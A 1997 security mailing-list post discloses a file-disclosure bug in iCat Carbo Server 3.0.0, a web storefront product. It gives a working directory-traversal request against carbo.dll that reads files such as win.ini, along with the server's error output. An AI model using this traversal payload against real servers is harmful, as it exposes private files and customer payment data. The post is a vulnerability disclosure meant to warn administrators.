[465] in Best-of-Security
BoS: Security bug in iCat Suite version 3.0
daemon@ATHENA.MIT.EDU (Mikael Johansson)
Sat Nov 15 13:24:12 1997
Delivered-To: best-of-security-mtg@menelaus.mit.edu
Date: Sat, 8 Nov 1997 11:11:12 +0100
Reply-To: Mikael Johansson <Mikael.Johansson@ABC.SE>
From: Mikael Johansson <Mikael.Johansson@ABC.SE>
Old-X-Originally-To: To: BUGTRAQ@NETSPACE.ORG
Old-X-Originated-From: From: Mikael Johansson <Mikael.Johansson@ABC.SE>
Errors-To: best-of-security-request@cyber.com.au
To: best-of-security@cyber.com.au
Resent-From: best-of-security@cyber.com.au
iCat Carbo Server is a program used to create interactive shopping
catalogs for the www. It was selected by PC Magazine's editors as the
best Web storefront creation software.
I've found a bug in the iCat Carbo Server Version 3.0.0. The bug let's
everyone view any file at a system that is using Carbo (except for files
with some special characters).
See for yourselves...
http request:
http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog
http answer:
[iCat Carbo Server (ISAPI, Release) Version 3.0.0 Release Build 244]
Error: (-1007) cannot open file 'C:\web\carbohome\file_to_view.htm'
To view their c:\winnt\win.ini:
http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog
As you can imagine this bug is rather dangerous. For example an evil
hacker could steal creditcard information from users that have bought
something at a site using Carbo Server 3.0.0.
Mikael Johansson
Mikael.Johansson@abc.se
